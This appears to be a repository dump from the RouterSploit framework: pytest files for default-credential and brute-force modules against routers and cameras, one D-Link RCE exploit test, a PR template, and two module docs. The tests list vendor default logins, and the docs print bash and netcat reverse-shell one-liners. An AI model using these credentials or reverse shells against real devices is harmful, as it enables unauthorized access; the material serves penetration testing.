["admin:admin", "admin:password"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/belkin/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.belkin.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 22 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "admin:password"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/thomson/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.thomson.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 21 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "admin:password"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/thomson/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.thomson.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 22 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "admin:password"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/cameras/samsung/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.samsung.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:1111111", "admin:4321", "root:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/generic/test_ftp_bruteforce.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.generic.ftp_bruteforce import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 21 11 | assert exploit.threads == 8 12 | assert exploit.usernames == ["admin"] 13 | assert type(exploit.passwords) is list 14 | assert exploit.stop_on_success is True 15 | assert exploit.verbosity is True 16 | 17 | exploit.target = generic_target.host 18 | exploit.port = generic_target.port 19 | 20 | assert exploit.check() is False 21 | assert exploit.check_default() is None 22 | assert exploit.run() is None 23 | -------------------------------------------------------------------------------- /tests/creds/generic/test_ssh_bruteforce.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.generic.ssh_bruteforce import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 22 11 | assert exploit.threads == 8 12 | assert exploit.usernames == ["admin"] 13 | assert type(exploit.passwords) is list 14 | assert exploit.stop_on_success is True 15 | assert exploit.verbosity is True 16 | 17 | exploit.target = generic_target.host 18 | exploit.port = generic_target.port 19 | 20 | assert exploit.check() is False 21 | assert exploit.check_default() is None 22 | assert exploit.run() is None 23 | -------------------------------------------------------------------------------- /tests/creds/routers/ipfire/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.ipfire.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 21 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "root:admin", "admin:"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/ipfire/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.ipfire.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 22 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "root:admin", "admin:"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/netgear/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.netgear.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 21 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "admin:1234", "admin:"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/netgear/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.netgear.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 22 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "admin:1234", "admin:"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/zyxel/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.zyxel.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 21 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "admin:1234", "admin:user"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/zyxel/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.zyxel.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 22 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "admin:1234", "admin:user"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/cameras/american_dynamics/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.american_dynamics.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin", "admin:9999"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/avigilon/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.avigilon.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin", "Administrator:"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/routers/asmax/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.asmax.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 21 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "support:support", "user:user"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/belkin/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.belkin.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 23 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "admin:password"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is True 20 | assert exploit.check_default() is not None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/movistar/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.movistar.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 23 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "1234:1234"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is True 20 | assert exploit.check_default() is not None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/netcore/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.netcore.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 23 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "guest:guest"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is True 20 | assert exploit.check_default() is not None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/thomson/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.thomson.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 23 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "admin:password"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is True 20 | assert exploit.check_default() is not None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/ubiquiti/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.ubiquiti.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 21 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "root:ubnt", "ubnt:ubnt"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/ubiquiti/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.ubiquiti.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 22 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "root:ubnt", "ubnt:ubnt"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/exploits/routers/dlink/test_dir_645_815_rce.py: -------------------------------------------------------------------------------- 1 | from unittest import mock 2 | from routersploit.modules.exploits.routers.dlink.dir_645_815_rce import Exploit 3 | 4 | 5 | @mock.patch("routersploit.modules.exploits.routers.dlink.dir_645_815_rce.shell") 6 | def test_check_success(mocked_shell, target): 7 | """ Test scenario - successful check """ 8 | 9 | route_mock = target.get_route_mock("/diagnostic.php", methods=["POST"]) 10 | route_mock.return_value = ( 11 | "OK" 12 | ) 13 | 14 | exploit = Exploit() 15 | 16 | assert exploit.target == "" 17 | assert exploit.port == 80 18 | 19 | exploit.target = target.host 20 | exploit.port = target.port 21 | 22 | assert exploit.check() 23 | assert exploit.run() is None 24 | -------------------------------------------------------------------------------- /docs/modules/payloads/cmd/bash_reverse_tcp.md: -------------------------------------------------------------------------------- 1 | ## Description 2 | 3 | Module generates payload that creates interactive tcp reverse shell by using bash one-liner. 4 | 5 | ## Verification Steps 6 | 7 | 1. Start `./rsf.py` 8 | 2. Do: `use payloads/cmd/bash_reverse_tcp` 9 | 3. Do: `set lhost 192.168.1.4` 10 | 4. Do: `set lport 4321` 11 | 5. Do: `run` 12 | 6. Module generates bash tcp reverse shell payload 13 | 14 | ## Scenarios 15 | 16 | ``` 17 | rsf > use payloads/cmd/bash_reverse_tcp 18 | rsf (Bash Reverse TCP) > set lhost 192.168.1.4 19 | [+] lhost => 192.168.1.4 20 | rsf (Bash Reverse TCP) > set lport 4321 21 | [+] lport => 4321 22 | rsf (Bash Reverse TCP) > run 23 | [*] Running module... 24 | [*] Generating payload 25 | bash -i >& /dev/tcp/192.168.1.4/4321 0>&1 26 | ``` 27 | -------------------------------------------------------------------------------- /tests/creds/generic/test_telnet_bruteforce.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.generic.telnet_bruteforce import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 23 11 | assert exploit.threads == 8 12 | assert exploit.usernames == ["admin"] 13 | assert type(exploit.passwords) is list 14 | assert exploit.stop_on_success is True 15 | assert exploit.verbosity is True 16 | 17 | exploit.target = generic_target.host 18 | exploit.port = generic_target.port 19 | 20 | assert exploit.check() is True 21 | assert exploit.check_default() is not None 22 | assert exploit.run() is None 23 | -------------------------------------------------------------------------------- /tests/creds/routers/ipfire/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.ipfire.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 23 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "root:admin", "admin:"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is True 20 | assert exploit.check_default() is not None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /.github/PULL_REQUEST_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | ## Status 2 | **READY/IN DEVELOPMENT/HOLD** 3 | 4 | ## Description 5 | Describe what is changed by your Pull Request. If this PR is related to the open issue (bug/feature/new module) please attach issue number. 6 | 7 | ## Verification 8 | Provide steps to test or reproduce the PR. 9 | 1. Start `./rsf.py` 10 | 2. `use exploits/routers/dlink/dsl_2750b_rce` 11 | 3. `set target 192.168.1.1` 12 | 4. `run` 13 | 5. ... 14 | 15 | ## Checklist 16 | - [ ] Write module/feature 17 | - [ ] Write tests ([Example](https://github.com/threat9/routersploit/blob/master/tests/exploits/routers/dlink/test_dsl_2750b_rce.py)) 18 | - [ ] Document how it works ([Example](https://github.com/threat9/routersploit/blob/master/docs/modules/exploits/routers/dlink/dsl_2750b_rce.md)) 19 | -------------------------------------------------------------------------------- /docs/modules/payloads/cmd/netcat_reverse_tcp.md: -------------------------------------------------------------------------------- 1 | ## Description 2 | 3 | Module generates payload that creates interactive tcp reverse shell by using netcat one-liner. 4 | 5 | ## Verification Steps 6 | 7 | 1. Start `./rsf.py` 8 | 2. Do: `use payloads/cmd/netcat_reverse_tcp` 9 | 3. Do: `set lhost 192.168.1.4` 10 | 4. Do: `set lport 4321` 11 | 5. Do: `run` 12 | 6. Module generates netcat tcp reverse shell payload 13 | 14 | ## Scenarios 15 | 16 | ``` 17 | rsf > use payloads/cmd/netcat_reverse_tcp 18 | rsf (Netcat Reverse TCP) > set lhost 192.168.1.4 19 | [+] lhost => 192.168.1.4 20 | rsf (Netcat Reverse TCP) > set lport 4321 21 | [+] lport => 4321 22 | rsf (Netcat Reverse TCP) > run 23 | [*] Running module... 24 | [*] Generating payload 25 | nc 192.168.1.4 4321 -e /bin/sh 26 | ``` 27 | -------------------------------------------------------------------------------- /tests/creds/cameras/american_dynamics/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.american_dynamics.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin", "admin:9999"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/samsung/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.samsung.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:1111111", "admin:4321", "root:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/routers/asmax/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.asmax.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 23 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "support:support", "user:user"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is True 20 | assert exploit.check_default() is not None 21 | assert exploit.run() is None 22 | --------------------------------------------------------------------------------